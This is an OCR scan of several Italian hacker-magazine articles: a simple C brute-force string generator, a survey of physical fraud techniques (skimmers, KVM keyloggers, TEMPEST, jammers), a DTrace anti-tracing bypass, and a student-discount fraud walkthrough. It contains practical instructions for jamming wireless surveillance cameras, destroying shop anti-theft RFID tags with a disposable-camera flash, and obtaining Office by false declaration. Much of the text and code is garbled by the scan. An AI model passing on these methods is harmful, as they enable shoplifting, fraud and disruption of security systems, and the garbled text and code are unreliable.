ma, per ora accontentiamoci di questo: 
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#include <stdio.h> 
#include <stdlib.h> 

int main (){ 

register int i; 

int x; 

printf ("Inserire lunghezza stringa: n ); 

scanf("%d", &x) ; 

for(i = 0;i<=x; i++){ 

f or (int a=97;a<=122;a++){ 
f or (int b=97;b<=122;b++){ 

if(i = =2)printf("%c%c\n", a,b); 
f or (int c=97;c<=122;c++){ 

if(i = =3) printf ("%c%c%c\n", a,b,c); 
f or (int d=97;d<=122;d++){ 

if(i = = 4) printf ("%c%c%c%c\n", a,b,c,d); 
for(int e=97;d<=122;d++){ 

if(i = =5) printf ("%c%c%c%c%c\n", a,b,c,d,e); 
f or (int f=97;d<=122;d++){ 

if(i = = 6) printf ("%c%c%c%c%c%c\n", a,b,c,d,e,f); 
f or (int g=97;d<=122;d++){ 

if (i = = 7) printf ("%c%c%c%c%c%c%c\n", a,b,c,d,e,f,g); 

} int x; 

-/ printf ("Inserire lunghezza 

< stringa: n ); 



system ("pause") ; 



:: Esaminiamo il codice 



register int i; 



register è uno specificatore di classe di 
memoria del C, dice al compilatore che 
l'accesso alla variabile (in questo ca- 
so T) deve essere effettuato più velo- 
cemente possibile, quindi generalmen- 
te la variabile viene memorizzata in un 
registro della CPU o nella memoria ca- 
che. L'accesso ai registri della CPU o 
alla memoria cache è nettamente più 
veloce dell'accesso alla RAM, di con- 
seguenza l'accesso alle variabili spe- 
cificate come register sarà più veloce. 
NB register tecinicamente è solo una 
richiesta che si fa al compilatore, que- 
st'ultimo è libero di ignorarla. Per chi 
ancora non l'avesse capito o per chi 
non ha letto il codice, ho specificato la 
variabili T come register perché è la va- 
riabile che controlla il ciclo principale. 
Andiamo oltre: 



scanf( n %d", &x) ; 



Questo è abbastanza elementare, di- 
chiara la variabile intera 'x' e chiede 
in ingresso un intero, la printf scrive la 
frase tra doppi apici. La variabile 'x' sarà 
la lunghezza della stringa da forzare, co- 
me scritto nella printf. 



Questo è il nostro algoritmo, non è 
roba da esperti, ma è introduzione al- 
la tecnica. Come vedete si compo- 
ne di 8 cicli for annidati, il primo, con- 
trollato dalla variabile T, è il ciclo che 
controlla tutti gli altri, viene iterato un 
numero di volte pari alla lunghezza 
della stringa da forzare. Ogni ciclo 
interno, a parte il primo, esegue un 
controllo sulla lunghezza della strin- 
ga. Il programma non esegue nessun 
controllo sul numero inserito, ma po- 
tete sempre inserirlo voi, comunque 
è chiaro che accetta una stringa lun- 
ga massimo 7 caratteri. Quindi ades- 
so diventa tutto automatico, se x = 2 
prova tutte le combinazioni da 'aa' a 
'zz', potete sempre aggiungere let- 
tere maiuscolo, simboli vari e nume- 
ri, basta avere una tabella ASCII da- 
vanti. Infatti nella tabella dei simboli 
ASCII la lettera 'a' corrisponde al nu- 
mero 97 e la lettera 'z' corrisponde 
al numero 122. Poi dipende dal pro- 
cessore a processore. Chiudo qui la 
spiegazione, in un eventuale pros- 
simo articolo mostrerò come fun- 
ziona un Brute Forcer più comples- 
so ed efficiente realizzato per mez- 
zo di funzioni. 
Saluti, 



LordHk 



for(i=0;i<=x; i++){ 

for (int a=97;a<=122;a++){ 
for (int b=97;b<=122;b++){ 

if (i==2) printf ("%c%c\n", a,b); 
for (int c=97;c<=122;c++){ 

if(i==3)printf("%c%c%c\n", a,b,c) ; 
for (int d=97;d<=122;d++){ 

if(i==4)printf("%c%c%c%c\n", a,b,c,d); 
for (int e=97;d<=122;d++){ 

if(i==5)printf( n %c%c%c%c%c\n", a,b,c,d,e); 
for (int f=97;d<=122;d++){ 

if (i==6) printf ("%c%c%c%c%c%c\n", a,b,c,d,e,f) ; 
for (int g=97;d<=122;d++){ 

if(i==7)printf("%c%c%c%c%c%c%c\n", a,b,c,d,e,f,g) ; 

} 
} 
} 
} 

} 
} 
} 

} 
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roprio in questi giorni il 
CENTRO DI CONTROLLO 
DEL CRIMINE ha rilasciato 
la notizia chele truffe su re- 
te hanno superato, come importo, 
quella del traffico di droga. 



:: 105 miliardi di dollari ! 



Ma come è possibile una cosa di 
questo tipo ? 

Lo sviluppo delle reti ha sempre avuto 
come fenomeno collaterale l'hacking 
manche se spesso 
^ l'uomo una volta partito per un 
viaggio non si accorge 
che il panorama è cam- 
biato strada fa- 
cendo. 

Mi spiego me- 
glio. Tanti anni 
fa Internet non 
esisteva e la 
telematica era 
ridotta all'uso di 
un modem da 
300 bauds su 
telefoni colle- 
gati a centrali 
meccaniche di- 
sturbatissime. 
I personal 
computer non 
erano diffusi e 
quindi le infor- 



mazioni erano dentro ai mainframe 
delle università e delle ditte, in parti- 
colare di quelle americane. 
Parlare di reti significava riferirsi alle 
grosse reti X25 quali ITAPAC la qua- 
le era connessa ai sistemi universita- 
ri ed ad altri definiti Outdial. 
Questi Outdial erano sistemi ai qua- 
li si arrivava tramite rete Itapac e che 
permettevano di chiamare sistemi 
grazie a un numero di telefono. 
Un collegamento telefonico con gli 
USA costava 1 scatto ogni secondo 
a 200 lire cadauno per cui stare col- 
legato a quelle velocità delle ore era 
un costo terribile. 

Da qui l'esigenza di entrare di frodo 
in Itapac e tramite questa connetter- 
si ai vari mainframe. 
Internet ha sconvolto tutto in quanto il 
collegamento è immediato con qual- 
siasi sistema e le informazioni sono 
presenti da tutte le parti senza dover 
entrare dentro ai vari sistemi VAX o 
quello che erano. 

L'hacker per cui ha iniziato a prende- 
re di mira i WEB su internet portando 
alla perdita dell'immagine che aveva 
una volta questo concetto. 
Ma internet non è più solo una rete 
ma una ricostruzione virtuale della 
società reale per cui contiene tutto il 
bene e il male di questa. 
Le persone orientate alle frodi hanno 
iniziato a sfruttare la tecnologia per 
prendere soldi da conti bancari, per 
frodare carte di credito, per creare 
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l'ambiente sicuro per furti e altre co- 
se di questo tipo. 

Il problema è che l'hacking ha mante- 
nuto la concentrazione delle ricerche 
sulla sicurezza verso i WEB e le reti 
collegate a internet perdendo di vista 
i veri pericoli. 

Da questo lo stupore della gente 
quando sente al telegiornale notizie 
del tipo : "Arrestata banda che fin- 
gendo di fare furti collegava skimmer 
ai sistemi di pagamento con carte 
dei negozi e benzinai e grazie a que- 
sti duplicava carte di credito e ban- 
comat." 



:: cose ancora più da fare 
sorridere come questa 

In pratica su una ditta americana 
acquistavano un sistema che per- 
metteva via WIRELESS di creare un 
estensione del posto di lavoro col- 
legando tastiera, mouse e video. 




Poi grazie a qualche trucco, che po- 
teva essere la complicità della don- 
na delle pulizie, entravano in banche 
o centri dove da terminale si faceva- 
no movimenti contabili e collegava- 
no l'extender, nascosto, alle posta- 
zioni di lavoro. 

In questo modo tranquillamente sedu- 
ti in macchina potevano fare trasferi- 
menti sui conti o altre cose sempre di 
carattere illegale. 

Voi direte : ma le password non si ve- 
devano a video ! 



:: Nessun problema 



Con l'installazione nascosta del 
KVM si installava sulla tastiera un 
KEYLOGGER come quello dell'im- 
magine il quale registrava i carat- 
teri battuti sulla tastiera per cui 
anche le password non erano più 
segrete. 



Per quanto riguarda i dati che 
passano via telefono, ad esempio 
i dati delle carte di credito, la cosa 
è ancora più semplice. 

Basta collegare un circuitine da pochi 
euro per avere un trasmettitore FM 
attivo e vigile ai pagamenti. 
Ma la tecnologia non si ferma qui 
in quanto grazie alle onde elettro- 
magnetiche gli americani stanno fa- 




O Ecco come viene modificato un bancomat per poter rubare i dati delle carte inserite e 
successivamente utilizzarli per i propri affari. 



Un'altra delle meraviglie tecnologiche 
sono stati i bancomat 'taroccati' con 
sistema di duplicazione scheda ma- 
gnetica e visualizzazione tramite tele- 
camera delle password digitate. 

:: E gli altri datiPPP 




cendo i fucili ma grazie a queste è 
possibile anche visualizzare le im- 
magini che scorrono su un compu- 
ter da distanze che possono arriva- 
re ai 100 mt senza avere nessun col- 
legamento. 

L'effetto si chiama TEMPEST e dipen- 
de dal fatto che tutti i circuiti elettroni- 
ci elaborando segnali, a volte anche 
a frequenze altissime, 
emettono campi elettro- 
magnetici che manten- 
gono i connotati dell'in- 
formazione a cui hanno 
contribuito a creare. 
I monitor dei computer 
ad esempio usano due 
orologi che servono a 
definire il ritmo con il 



O Ecco lo schema di un circuito da poche 
lire per costruire un trasmettitore FM attivo 
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O Questo è il risultato di una lettura a distanza di un monitor effettuata tramite cannone elettronico. 



quale un cannone elettronico dise- 
gna orizzontalmente i pixels e quello 
con il ritmo di creazione di ciascuna 
riga. Dicendo cannone elettronico si 
penserebbe che solo i monitor CRT 
sono soggetti a questo pericolo. Que- 
sto è sbagliato in quanto 
anche con i monitor LCD, grazie a un 
antenna, a un ricevitore è possibile ri- 
costruire da distante le immagini che 
uno sta guardando sul video. 
Il fenomeno venne studiato inizial- 
mente da Erik Van Eck e descritto in 
un suo documento reperibile in re- 
te intitolato : "Electromagnetic Ra- 
diation from Video Display Units: An 
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Eavesdropping Risk?". Il metodo per 
anni è stato tenuto sotto segreto mili- 
tare e ancora adesso molte cose non 
rese pubbliche ma qualche anno fa 
un ricercatore giapponese, tale Ta- 
naka, rese pubblico uno scritto in cui 
si mostrava che con meno di 2000$ 
era possibile farsi in casa un ricevi- 
tore tempest. Lo scritto si intitola : 
"A Trial of the Interception of Display 
Image using Emanation of Electro- 
magnetic Wave." Il sistema usava un 
antenna direttiva e un analizzatore 
di spettro ma mostrando che anche 
con un ricevitore da radioamatore era 
possibile fare la stessa cosa. 




O Alcuni esempi di lettura remota tramite 

cannone laser. 
© Con un piccolo chip acquistabile in rete 
si può inibire qualsiasi GPS, compreso 
l'antifurto satellitare di un auto. 

Le immagini qui sopra sono il risul- 
tato. 

La prima è l'immagine vista con il 
sistema mentre la seconda 



l'immagine originale. Considerate che 
questa immagine è stata 'vista' senza 
nessun collegamento, ne rete ne al- 
tro, con il computer originale. Markus 
Khun del centro di ricerca sulla sicu- 
rezza dell'università di Cambridge ha 
redato un volume di 300 pagine con 
dettagliate informazioni tecniche. 
Il documento si chiama 
UCAM-CL-TR-577.pdf Questa è una 
prova fatta in casa dal sottoscritto, da 
una distanza di 10 metri attraverso un 
muro, grazie solo a un antenna e ad 
un analizzatore di spettro collegato a 
due oscillatori che generassero i sin- 
cronismi verticali e orizzontali . 
In genere gli alti costi per la creazio- 
ne di un sistema d'intercettazione ha 
fatto si che per anni il problema fos- 
se ignorato. 

La creazione di documenti in cui si 
vede come farselo in casa ha porta- 
to e cercare di identificare le soluzio- 
ni per la protezione anche se di fat- 
to, se non previste prima, spesso so- 
no difficilmente attuabili. 
Il motivo di questa affermazione è che 
ad esempio l'effetto tempest coinvol- 
ge anche i cavi elettrici in quanto le 
emanazioni dei computer grazie a 
queste vengono convogliate fuori da- 



gli edifici del 
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sistema. 

Le immagini si ri- 
feriscono a un 
test di intercet- 
tazione grazie ai 
cavi di alimenta- 
zione : 

Le protezioni fon- 
damentalmente 
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O Schema di intercettazione di telefono cellulare. 



sono legate alla creazione di loca- 
li schermati, all'uso di computer AN- 
TITEMPEST o all'uso di mascherato- 
ri elettronici. 

Un esperimento molto simpatico è 
TEMPEST FOR ELIZA. 
In pratica all'indirizzo : 
http://www.erikyyy.de/tempest/ 




© Per truffare e intercettare non servono 
computer di ultima generazione 

è possibile prelevare un programmi- 
no LINUX al quale passandogli un fi- 
le MP3 lo modula sul video. 
Usando una normale 
radio AM/FM è possibile sentire il bra- 



no trasmesso grazie ai campi elettro- 
magnetici del sistema. Ogni trasmis- 
sione radio possiede una frequenza 
fondamentale che in questo caso è 
intorno ai 60 MHZ e delle oscillazioni 
armoniche sui multipli della frequen- 
za della portante, con potenza sem- 
pre più bassa. 

Le intercettazioni che si cercano di 
fare a 70 MHZ hanno il problema 
del grosso 'rumore radio ambienta- 
le' legato a cercapersone, radio pri- 
vate ecc. 

Man mano che si sale in frequenza, 
verso il GHZ, il segnale dell'armonica 
è molto più basso ma il rumore am- 
bientale è inesistente per cui l'inter- 
cettazione può avvenire in modo mol- 
to migliore. 

Molte volte un segnale CW pulitissi- 
mo di altissima potenza viene sapara- 
to orientato verso il locale con i com- 
puter, magari molto distanti. 
L'onda inviata incontrando il campo 
elettromagnetico dei computer mo- 
dula la portante la quale riflessa tor- 
na indietro portandosi il segnale da 
visualizzare. Ma queste sono tecni- 
che molto più avanzate difficilmente 
attuabili dall' hacker casalingo. I ri- 
schi delle nuove tecnologie comun- 
que non si fermano a questo ma han- 
no colpito anche gli altri mezzi come 
ad esempio i cellulari. 



Sulla rete è possibile trovare sche- 
mi si Jammer, anche da taschino, 
che sono in grado di bloccare GSM 
e GPS. Ad esempio molti tracciatori 
GPS antifurto possono essere bloc- 
cati con una spesa di poche decine 
di euro. 

Il sistema emette disturbi che non 
permettono più ai cellulari e ai gps di 
comunicare con le cellule e con i sa- 
telliti, rendendoli quindi inutilizzabili. 
Ricordiamoci che queste cose sono 
vendute a poco sulla rete pronte per 
l'uso ma grazie a schemi e circuiti vari 
è possibile anche crearli in casa. 
Intercettare i GSM/UMTS non è più 
cosa da centrale TELECOM ma con 
un sistema portatile è possibile farlo. 

Il problema grosso è che la tecno- 
logia corre e si è dimenticata di una 
cosa : per non fare sentire un infor- 
mazione non si deve gridarla per la 
strada. 

Questo è il principio di tutto quello 
che funziona via radio. 
Ne è un esempio la rete WIRELESS. 
Grazie a sistemi di codifica dei dati 
posso rendere difficile decodificare 
le informazioni trasmesse ma grazie 
a un sistema dotato di un oscillatore 
e di un amplificatore di RF posso fare 
in modo che tutto vada in TILT. 

Prendiamo ad esempio un sistema di 
video sorveglianza fatto con videoca- 
mere WIRELESS a 2.4 GHZ. 
Vado al supermercato e compro un 
trasmettitore di segnali TV e RADIO e 



O // circuito del flash di una macchina 
fotografica usa e getta 
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O Per decriptare un sistema sempre attuale è il cluster di macchine che permette velocità 
di calcolo molto più elevate di un pc standard. 



lo collego a un amplificatore di segna- 
le da 5 W dopo di che lo nascondo vi- 
cino alla ditta alla quale voglio distur- 
bare il sistema di sorveglianza. 
Basta ... non c'è' altro da dire ... non 
si vedrà più nulla grazie al disturbo. 
La stessa cosa può essere estesa a 
tutto ciò che funziona via radio come 
RFID, bluetooth, cellulari. 
I danni del bluetooth con il quale so- 
no stati trasmessi virus sono a cono- 
scenza di tutti. 



RFID è stato riportato come uno dei 
piloni della sicurezza futura senza 
considerare che : 

• può essere coperto da un segnale 
radio forte 

• è stato decodificato 

• è stato copiato 

• può essere intercettato 

• può essere bruciato grazie al campo 
elettromagnetico emesso dal mecca- 
nismo smontato del flash di una foto 
camera usa e getta. 




O Ecco la macchina fotografica da cui 
preleveromo il notro generatore di scariche 



Qualche anno fa provammo a fare un 
esperimento. 

Collegammo un oscillatore a 125 KHZ 
a un vecchio amplificatore audio PIO- 
NEER da 100W con risposta in fre- 
quenza da 10HZa 100KHZ. 
Poi attorno a una cassetta in plastica 
della frutta arrotolammo 100 metri di 
cavo elettrico usato come antenna. 
Nel giro di 20 metri non era più possi- 
bile usare un RFID in quanto tutti era- 
no diventati sordi grazie al forte se- 
gnale di copertura. 
Ora pensate che molti sistemi antitac- 
cheggio dei supermercati funzionano 
grazie a questi. 

Con una macchina posteggiata fuo- 
ri da questo con il sistema accesso 




m/m 




mmmmmm 



O Ecco come funziona un microfono laser autocostruito per l'intercettazione di una conversazione dietro un vetro. 
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l'antitaccheggio andrebbe in tilt non 
rilevando più nulla. 
Ma lasciando stare circuiti per il bloc- 
caggio di massa esistono sistemi che 
permettono di disabilitare ogni sin- 
golo RFID e quindi di uscire con la 
marce in mano senza che l'antifur- 
to suoni. 

Tutti sanno che i circuiti elettronici 
sono sensibili ai campi elettrostatici i 
quali li danneggiano. 
Come creare un piccolissimo genera- 
tore di cariche statiche che avvicina- 
te ai chip del sistema antitaccheggio 
lo brucia rendendolo sordo ? 
Prendete una macchina fotografica 
usa e getta Kodak, ad esempio, con 
FLASH. 

Usatela e poi prima di buttarla smon- 
tatela mettendo a vista il circuito 
che manda la scarica al 
FLASH. 

Togliete la lampada del 
FLASH e al suo posto 
collegate una matas 
sa di cavo elettrico 
in modo da fare una 
bobina. 

Quando vorrete 
bruciare il CHIP 
basterà avvicina- 
re la bobina a questo e 
premere il pulsante di 
scatto fotografia. 
La scarica origina 
riamente destina- 
ta al FLASH ar- 
riverà alla bobi 
na creando un 
campo elettro- 
statico talmen 
te forte da 
danneggiare 
RFID del- 
l'antitac- 
cheggio. 

O Clonare una sim è 

sempre stata una cosa 
considerata difficile. Ora non più 



Per decrittare RFID un università ha 
scritto in VHDL, un linguaggio per 
creare progetti elettronici, l'algorit- 
mo e con questo ha creato un chip 
su FPGA. 

Poi ha messo in parallelo 50 schede 



e queste lavorando in collaborazio 
ne hanno decrittato l'algoritmo a 
40 BITS della TEXAS. 



Sempre rintracciabili in rete 
ci sono delle serie di pro- 
dotti, fattibili facilmente in , 
casa, grazie ai quali la 
propria privacy andreb- 
be a farsi un giro. 




Ad esempio grazie a un 
puntatore laser e a po- 
chi altri componenti è 
possibile costruirsi un mi- 
crofono laser grazie al qua 
le è possibile sentire le mi- 
ero vibrazioni dei vetri delle ca- 
se dovute al nostro parlare al lo 
ro interno. 

Oppure sono venduti dei KIT per tra- 
sformare un cellulare con videocame- 
ra in uno strumento di spionaggio au- 
tomatico. 

In altre parole aggiun- 
gendo un illuminato- 
re all'infrarosso, lu- 
ce non visibile dal- 
l'occhio umano, 
e un rilevatore di 
movimento si ot- 
tiene che ogni vol- 
ta che una persona 
passa davanti al cel- 
lulare questo chiama 
un numero trasferen- 
do le immagini visualiz- 
zate dall'obbiettivo. 

Inoltre è anche possibile 
chiamare il telefono per ot- 
tenere la stessa funzione. Ad 
ogni modo con le nuove tec- 
nologie ce n'e' per tutti i gusti 
anche grazie alle facilitazioni 
commerciali dovute al fatto che 
ormai si trova tutto e di più. 



:: Una volta clonare 
una SIM era un lavoro 
da esperto 



Oggi si compra il KIT in scatola di 
montaggio. 




O Un trasmettitore FM completo paragonato 
ad un quarto di dollaro americano 

Il problema è che i gestori della 
sicurezza devono iniziare ad ampliare gli 
orizzonti in quanto questa non è più solo 
in mano a firewall e router. 
Il problema non è tanto le soluzioni che 
dovrebbero adottate grazie a contromisu- 
re elettroniche ma semplicemente il fatto 
di avvertire gli utenti perché facciano at- 
tenzione ai loro sistemi elettronici. 

Insegnare a guardare dietro a un com- 
puter per vedere se c'è un extender KVM 
non è un metodo costoso come non lo è 
il sistema di fare guardare la linea telefo- 
nica da parte del benzinaio per vedere se 
tra il POS e la presa non ci sono ogget- 
ti non originali. 

L'ignoranza spesso è il peggior nemi- 
co dei problemi di sicurezza in quanto 
una volta conosciuti i metodi il controllo è 
spesso veramente semplice. 
D'altra parte l'elettronica va sempre più 
avanti. 

Una volta a fare una microspia ci andava- 
no molti componenti. 
Guardate un chip che fa tutto ovvero un 
trasmettitore FM completo, paragonato a 
un a quarto di dollaro. 
La reti ormai sono troppo blindate per 
usarle per arrivare alle truffe : però 
basta usare le porte laterali ! 

Flavio Bernardotti 
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Ovvero: come b perché Apple 
lia castrato m software 



studiare le sue protezioni _ 
tecnologiche, t cosa si può fare 
per rimettere a posto le cose 



M 



ell'ultima versione di Mac OS 
X, la 10.5, l'ambiente di svi- 
luppo XCode è stato profon- 
damente rinnovato e include 
una potente utility chiamata DTrace 
(http://opensolaris.org/os/commu- 
nity/dtrace/). 

Sviluppata originariamente da Sun 
ed inclusa in Solaris 10, Dtrace per- 
mette di monitorare accuratamen- 
te e senza impatto sulle performan- 
ce il funzionamento di qualsiasi sof- 
tware in esecuzione ed Apple, atten- 
ta alle novità, ha mutuato questa tec- 
nologia open source pubblicizzando- 
ne la presenza in Leopard il cui sof- 





tware di analisi e trouble- 
shooting Instruments (http:// 
www.apple.com/macosx/de- 
velopertools/instru ments.html) 
ne fa ampio uso 



:: La scoperta 
di Leventhal 

La scelta ha incontrato l'appro- 
vazione di uno dei tre creatori di 
DTrace, Adam Leventhal, che nel- 
l'estate del 2007 (http://blogs.sun. 
com/ahl/entry/dtrace_on_mac_os_ 
x) è stato invitato alla convention Ap- 
ple per sviluppatori e ha conosciu- 
to ed incontrato il team di Cupertino 
che aveva adottato (ed adattato) la 
«sua "creatura". 



O L'ambiente di sviluppo di Mac OS X, XCode 





OAdam Leventhal con il team Apple 
nell'estate del 2007 
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Qualche mese dopo la soddisfazione 
di Leventhal si è trasformata in sorpre- 
sa e poi perplessità alla scoperta (ht- 
tp://blogs. sun.com/ahl/entry/mac_os_ 
x_and_the) che Apple aveva apportato 
qualche piccola ma sostanziale modifi- 
ca. Usando la versione inclusa in Mac 
OS X a Leventhal non ridavano i conti 



e nello specifico è risultato che iTunes, 
seppure in esecuzione, non risultavano 
all'appello di DTrace. 

:: Un DTrace menomato 

L'ipotesi che Apple avesse deci- 



so di disabilitare DTrace per al- 
cuni specifici software si è rive- 
lata realtà e, usando i coloriti toni 
di Leventhal, qualcuno a Cupertino 
non ha gradito uno strumento egali- 
tario decidendo di appesantire dtra- 
ce_probe(), il cuore dell'utility con 
questo orpello: 



#if defined( APPLE ) 

/* 

* If the thread on which this probe has f ired belongs to a process marked P _ LNOATTACH 

* then this enabling is not permitted to observe it. Move along, nothing to see here. 
*/ 

if (ISSET(current _proc()->p_ lflag, P _ LNOATTACH) ) { 
continue; 

} 

#endif /* APPLE */ 



In altre parole Apple impedisce espli- 
citamente che DTrace esamini o salvi 
dati relativi a processi che non ammet- 
tono il tracing per mezzo della richiesta 
PT DENY ATTACH. 




O Instruments fa parte del nuovo XCode 
ed include DTrace 



:: Il CaSO 

La conclusione di Leventhal è mode- 
rata nei termini ma pesante nel giu- 
dizio: una scelta del genere non so- 



lo è errata concettualmente ma va 
contro l'obbiettivo del software da 
lui cocreato oltre che contro lo spi- 
rito dell'open source e invoca il ripri- 
stino delle piene funzionalità. Alla que- 
stione è stata data ampia eco su vari si- 
ti e testate che l'hanno sintetizzata attor- 
no all'uso o meglio abuso del PT_DENY_ 
ATTACH e le possibili motivazioni. Il pen- 
siero va immediatamente alla volontà di 
Apple di proteggere i suoi interessi eco- 
nomici e di celare ad occhi indiscreti mec- 
canismi delicati. Quali? Ma quelli relativi 
alle protezioni di DRM per i contenuti au- 
diovisuali che commercializza attraverso 
l'iTunes Store e gestisce con il layer di 
protezione Fairplay. Tra le reazioni tec- 
niche la più interessante è quella dello 
sviluppatore indipendente Landon Fuller 
che ha caldeggiato anche lui la rimozio- 
ne dei blocchi da parte di Apple ma nel 
frattempo ha deciso, come già in passa- 
to, di rimboccarsi le maniche ed affronta- 
re subito il problema. 



:: Una Kext per 
aggirare il blocco 

In "Fixing ptrace(pt_deny_attach, 
...) on Mac OS X 10.5 Leopard" (ht- 
tp ://landonf. bikemonkey. org/co- 
de/macosx/Leopard_PT_DENY_ 
ATTACH.20080122.html) Fuller non 
solo dà un'infarinatura tecnica sui 
meccanismi in azione ma fornisce un 
hack, una patch per aggirare le mo- 
difiche di Apple: la soluzione passa 
attraverso una KEXT, cioè un'esten- 
sione del kernel da scaricare ed in- 
stallare. 

Ciò che fa l'estensione è tenere d'oc- 
chio i puntatori alle chiamate di siste- 
ma in Xnu (il kernel di Mac OS X) e, 
quando necessario, inserisce del co- 
dice sostitutivo come si può vedere 
dall'output del comando dmesg (che 
interroga il buffer del kernel): 



[ptrace] Found nsysent at 0x502780 (count 427), calculated sysent location 0x5027a0. 

[ptrace] Sanity check 10 3 4 4: sysent sanity check succeeded. 

[ptrace] Patching ptrace (PT _ DENY _ ATTACH, ...). 

[ptrace] Blocking PT _ DENY _ ATTACH for pid 82248. 



Sottolineiamo che si tratta di una so- 
luzione indipendente, non universal- 
mente testata e da usare a proprio 
rischio e pericolo. 
Detto questo nelle scritte qui sopra 



si può notare che l'estensione fa an- 
che dei controlli per evitare un ker- 
nel panie. 

Se c'è qualche problema il modu- 
lo scritto da Fuller semplicemente 



non viene caricato. Se invece tutto 
è ok il PT_DENY_ATTACH di Apple 
viene disabilitato ed i processi non 
avranno alcun velo, come nel DTra- 
ce originale. ■ 
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i unum Ha in ene la 
compagnia di Redmond lancia 
offerte speciali relative ai suoi prodotti 
e destinate agli studenti, apprendiamo 
meda per Office 2008 






9 



ce 2007 Ultimate costa da li- 
ino CHL (link dal sito store 
Microsoft) 817,20 euro, ov- 
iamente uno studente non 
ò permettere una cifra del ge- 
nere per un pacchetto di software e 
magari non è a conoscenza dell'esi- 
stenza di prodotti alternativi e vali- 
di come OpenOffice, lui sa solo che 
deve preparare la tesi e che gli stru- 
menti compresi nel pacchetto Offi- 
ce gli farebbero molto comodo. Beh, 
Microsoft ha pensato proprio a questo 
povero ragazzo è ha lanciato, ormai da 
qualche tempo, un'operazione chiama- 
ta "Office 30 e Lode" permette agli stu- 
denti universitari in possesso di una 
mail di un'università riconosciuta di ac- 
quistare la prestigiosa versione ultima- 
te di Office a soli 52 euro oppure, an- 
cora più interessante, a soli 18 euro la 
licenza valida per un anno. Alcuni ma- 
liziosi, tra qui ci annoveriamo, pense- 
ranno che quelli di Redmond non san- 
no più come disfarsi delle confezioni in- 
vendute di Office in italiano visto che le 
vendite non stanno proprio andando in 



maniera eccezionale ma comunque tro 
viamo questa una buona iniziativa. 



:: Come fare 



rlrt Micron 

Ex«l. 20* _.- 








L'operazione è davvero semplice, 
con la nostra mail universitaria (la li- 
sta delle università accettate si trova A questo punto ci viene chiesto di inseri- 
all'indirizzo http://store.digitalriver. re la nostra mail universitaria sulla quale 
com/store/itmssh/ContentTheme/ riceveremo la conferma se possiamo 
pbPage.universities) ci colleghiamo meno partecipare all'iniziativa. 
al sito www.office30elode.it, da qui 
scegliamo se acquistare la licenza 
vitalizia o quella per un anno. 



II! 



Vi 



I - - 






Dalla mail basta cliccare sul I in 
siamo pronti a procedere con l'acqui- 
sto di Office 2007 Ultimate, possiamo 
scaricarlo o ricevere a casa nostra il 
ed con una spesa accessoria per la 
duplicazione e la spedizione. 



[ p 24 )_[ www.hackerjournal.it ] 







I 



MlETB»flll Ùttkm Ull>TTUtl M»7 iì 






i kuntm «lln «ir 

Di«flto [OLIO ir Jhù 



ma diil'HOUlU oitt-TiÉ un thlirt di ; 
A le rW mai turtt jrln ?jgl rtifMMrli 



LE dlJWfll -J'.i' teiere sf il: ..JH Vfi» 



ta di credito, si accettano le condizioni biamo detto, viene accettato dalla pro- 
contrattuali e si parte con il download. mozione fatta da Microsoft. 




University Box e proviamo a registrarci. 
Nel form ci viene richiesto a quale isti- 
tuto universitario siamo iscritti ma nulla 
di più che la nostra parola, nessun nu- 
mero di matricola o altro. 



Stiamo parlando di Microsoft e quin- 
di non può non esserci un problema 
di sicurezza!!! Mettiamo caso di esse- 
re dei truffatori (in questo caso si trat- 
ta proprio di questo, dichiarare il falso 
per appropriarsi di qualcosa a cui non 
si avrebbe diritto) e di volere a tutti i 
costi Office 2007 Ultimate ma non vo- 
ler spendere i famosi 800 euro. A que- 
sto punto ci viene la malsana idea di 
approfittare di Office 30 e lode senza 
però essere iscritti a nessuna univer- 
sità. Scorrendo la lista delle università 
che posso partecipare alla promozione 
scorriamo un indirizzo che non dipen- 
de direttamente da nessun istituto, Uni- 
versity Box. 

Si tratta di un sito di social networking 
tra studenti universitari tipo Face- 
book e altri che, tra l'altro, ha anche 




Se siamo dei truffatori non ci ferme- 
remo certo davanti a questo, inseria- 
mo una università a caso e procedia- 
mo con inserire i dati richiesti ed ec- 
coci, in breve, ad avere la nostra bel- 
la mail per poter scaricare Office con 
lo sconto... 



:: Note legali 



rocedimento che vi abbiamo 
illustrato funziona ma è basato 
la dichiarazione del falso e rap 
senta un illecito con tutte le co 
guenze civili del caso e forse ad< 
tura penali. Rendiamoci conto chi 
si dichiara il falso in ben due occas 
la prima per la creazione dell'acce 
University Box e la seconda al mon 
to dell'accettazione dei termini con 
tuali con Microsoft per l'acquisto 
pacchetto di programmi. Se andiar 
leggere nella licenza quelli di Redrr 
si sono parati le spalle contro gent 
come quella che abbiamo descritte 
è quindi previsto un controllo. 



Condizioni di acquisto 



Dowr 



Per potere usufruire dell'offerta devi possedere un indirizzo e-mail valido a te in 
l'elenco dei domini supportati) ed essere iscritto all'università ed almeno a un co 
dimostrare di essere realmente uno studente universitario qualora li venga richù 
tessera universitaria in corso di validità. Nel caso tu non fossi in grado di produr 
addebitarti il costo al pubblico di Office Ultimate 2007, pari a €799.95. 



Per la precisione si dice che non 
sta avere un indirizzo mail valido 
ni della promozione ma bisogna an 

occoro icrrittr» ari i in'i inix/nrcità q n 



dimostrare la tua iscrizione presen 
do la tessera universitaria in cors 
validità. Nel caso non si fosse in 
do di presentare quanto richiesto 
crosoft si riserva il diritto di add 
farti il costo intero della licenza pi 
799,95 euro. 



:: Per concludere 



Come al solito ci sentiamo in 
bligo di ricordavi che l'etica hai 
non prevede il furto, la truffa o q 
siasi forma di illecito, non è qu< 
che si intende per hacker. Qu; 
scritto in questo articolo è solo a 
pò esemplificativo e riteniamo ch< 
ferte come quella qui presentate 
Microsoft siano interessanti e ai 
lutamente da favorire, se si vuok 
software gratis le alternative esist 
e sono ottime. 
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notti e notti svegli moti ol monitor, 
aoa stiano parlando ili stokaoovisti 
Mia programmazioni ma Ai 
vMeogiocatori on-line 




1 MORPG, o anche solo RPG. 

ili I I più ferrati in materia san- 
J I no che stiamo parlando dei 

^j Massive(ly) Multiplayer Onli- 
ne Role-Playing Games, in soldoni, dei 
Giochi di Ruolo (da orga GdR) Online 
e non. Giochi come, per citarne uno a 
caso, World of Warcraft (da ora WoW). 
Giochi che riescono a rapire il giocatore 
fino alla paranoia. Qualcuno si chiede 
cosa possa avere di tan- 
to speciale ed eccitan- 
te vedere un omino -^ 
vestito come Harry 



r 




Potter o come Beowulf che cammina 
sullo schermo e semina il panico tra i 
vari "animali" che girano sulla mappa di 
gioco. Beh, ve lo dice un appassiona- 
to di WoW cosa c'è di speciale, NIEN- 
TE! A parer mio ciò che condiziona mi- 
lioni di persone a distruggere la propria 
vita e condizione sociale per un gioco 
